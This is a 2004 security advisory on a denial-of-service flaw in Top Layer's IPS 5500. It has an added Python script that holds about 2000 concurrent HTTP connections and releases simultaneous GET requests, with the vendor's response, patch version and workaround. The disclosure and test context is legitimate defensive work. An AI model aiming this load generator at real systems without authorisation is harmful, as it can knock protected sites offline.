Advisory 010
Top Layer Attack Mitigator IPS 5500 Denial of Service
Problem discovered: July 22nd 2004
Vendor contacted: July 23rd 2004
Advisory published: August 25th 2004
Abstract:
Top Layer's Attack Mitigator IPS 5500 is an ASIC-based Network
Intrusion Prevention System (NIPS), with blocking and control
capabilities against certain types of cyber attacks. The product's
datasheet states that 'Top Layer's second-generation ASIC technology
and patented algorithms integrate proven stateful analysis techniques
with its new 'TopInspect' deep packet inspection technology and
industry-leading DoS attack protection to provide comprehensive
protection from Internet-based and internal threats'.
During a recent security consultancy engagement, IRM discovered that under
certain specific circumstances the Top Layer IPS 5500 series CPU usage
could reach 100% utilisation, where it would not be able to process
further network traffic, and any site protected by the device would
become inaccessible.
Description:
The system under test comprised a web server farm accessible via a load
balancer and protected by an IPS 5500 device. IRM discovered that upon
simulating more than 2000 concurrent HTTP requests to the server farm,
the IPS 5500 device reached a state where it was utilising all its CPU
power and therefore was unable to process standard HTTP traffic.
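The following script is an added illustration of the test method described above; it is example code written for this page, not IRM's test tooling and not Top Layer's code. It opens N TCP connections to an HTTP listener, holds them all open, and then releases N GET requests at once, returning counts of successful, other and failed responses. The target host, port and path are assumptions; the bundled local HTTP server exists only so the script runs stand-alone and stands in for the web server farm behind the IPS.

```python
"""Concurrent HTTP request generator (added example, not from the advisory).

Assumptions: the target host, port and path are supplied by the caller; the
local test server below is a stand-in origin so the script runs offline.
"""
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class _QuietHandler(BaseHTTPRequestHandler):
    """Minimal test origin: answers every GET with a short 200 response."""

    def do_GET(self):
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


class _TestServer(ThreadingHTTPServer):
    # Larger listen backlog so a burst of simultaneous connects is not dropped.
    request_queue_size = 1024


def start_test_server():
    """Start a local HTTP server on an ephemeral port; returns (server, port)."""
    server = _TestServer(("127.0.0.1", 0), _QuietHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def _one_request(host, port, path, timeout, results, idx, barrier):
    """Open one connection, wait at the barrier until every worker holds an
    open connection, then send a GET and record the HTTP status code."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            barrier.wait(timeout)  # all N connections are established here
            s.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            data = b""
            while b"\r\n" not in data:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
            status_line = data.split(b"\r\n", 1)[0].decode(errors="replace")
            parts = status_line.split(" ")
            results[idx] = (int(parts[1])
                            if len(parts) > 1 and parts[1].isdigit() else None)
    except (OSError, threading.BrokenBarrierError):
        results[idx] = None  # connect, barrier or read failure counts as failed


def concurrent_requests(host, port, path="/", n=2000, timeout=10.0):
    """Hold n concurrent connections open, then send n simultaneous GETs.
    Returns counts of 2xx responses, other responses and failures."""
    results = [None] * n
    barrier = threading.Barrier(n)
    threads = [threading.Thread(target=_one_request,
                                args=(host, port, path, timeout, results, i, barrier))
               for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    ok = sum(1 for r in results if r is not None and 200 <= r < 300)
    failed = sum(1 for r in results if r is None)
    return {"sent": n, "ok": ok, "other": n - ok - failed, "failed": failed}


if __name__ == "__main__":
    # Self-contained demonstration against the local stand-in origin.
    srv, p = start_test_server()
    try:
        print(concurrent_requests("127.0.0.1", p, "/", n=200))
    finally:
        srv.shutdown()
        srv.server_close()
```

Run it only against a lab target you are authorised to load-test: at 2000 concurrent connections the client and any intermediate device are both under real stress, and on the client you will first need to raise the open-file limit (for example `ulimit -n 4096` on Linux) or the connects fail before the barrier is reached. A sharp rise in the "failed" count while the origin itself stays healthy is the symptom to correlate with the IPS CPU figure in the vendor's Immediate Security Report.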
Tested Versions:
Top Layer Attack Mitigator IPS 5500 running software version 3.11.008
Vendor Response:
Top Layer was notified of this issue on July 22, 2004 by IRM. A bug
exists in Attack Mitigator IPS 5500 software versions earlier than
V3.11.014 that could cause the IPS 5500 device to incorrectly enter an
overload protection mode and negatively impact network traffic. In
extreme cases, this can cause a denial of service condition. The effect
of this bug appears only when the IPS 5500 unit is configured in a
topology where a high-volume of network packets traverse the IPS unit
twice due to a "one-armed" routing configuration.
The presence of this error condition will exhibit the following when
viewing the IPS 5500 Immediate Security Report: Current System Processor
Utilization = 100% and the value for System CPU Overload Protection is
non-zero.
Vendor & Patch Information:
Top Layer were contacted during the testing and immediately started
investigating the issue. Top Layer then updated the IPS code (to
version 3.11.014) which resolved the issue during the timescales of the
security engagement. The latest IPS 5500 software is available from Top
Layer at: http://www.toplayer.com/content/support/tech_assist/index.jsp
Workarounds:
Top Layer explained that a workaround would be to avoid deploying an IPS 5500 in "one-armed" router configurations.
Credits:
Research & Advisory: M Faour, L Garman
Disclaimer:
All information in this advisory is provided on an 'as is' basis in the
hope that it will be useful. Information Risk Management Plc is not
responsible for any risks or occurrences caused by the application of
this information.